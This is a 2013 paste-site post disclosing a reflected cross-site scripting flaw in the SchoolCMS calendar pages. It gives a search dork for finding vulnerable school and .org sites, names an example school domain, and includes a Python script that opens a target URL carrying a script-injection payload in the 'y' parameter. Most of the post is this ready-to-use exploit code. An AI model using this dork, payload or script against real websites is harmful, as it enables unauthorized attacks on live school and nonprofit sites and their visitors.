SchoolCMS software vulnerable to more XSS.


SUBMITTED BY: Guest

DATE: Sept. 23, 2013, 7:49 p.m.

FORMAT: Text only

SIZE: 1.9 kB

HITS: 1130

  1. SchoolCMS software vulnerable to more XSS.
  2. Shame this time its not persistent, I originally found a persistent XSS on this software in the eventform.php file. There is records for this on exploit.db. This times its a non persistent but it remains in dozens and dozens of schools and .org sites.
  3. Exploit:
  4. /old_core/cal/month.php?cid=
  5. /old_core/cal/day.php?catid=
  6. /old_core/cal/week.php?catid=
  7. The y parameter is vulnerable to XSS. If you are too lazy to do manually, here is a python script to do it for you Tongue.
  8. Code: SELECT ALL
  9. #!/usr/bin/python
  10. import sys
  11. import webbrowser
  12. import urllib2
  13.     
  14. print "######################################"
  15. print "#SchoolCMS auto-XSS inject script    #"
  16. print "#Dork: inurl:/old_core/cal/month.php #"
  17. print "#Author: VipVince                    #"
  18. print "#Vendor: http://www.poweritschools.com      #"
  19. print "#                                    #"
  20. print "######################################"
  21.     
  22. print "XSS lies in y=parameter of the URL in the calender. (Year)"
  23. print "After dorking a site, Enter URL like: http://www.oaklandschoolsnj.org"
  24. print "Let the script do the rest Wink"
  25. payload = "/old_core/cal/month.php?cid=&catid=&m=-1&w=5&y=<script>alert(1)</script>"
  26. site = raw_input('Enter site to XSS: ')
  27. inject = webbrowser.open(site+payload)
  28. raw_input("Press any key to exit ")
  29. Enjoy

comments powered by Disqus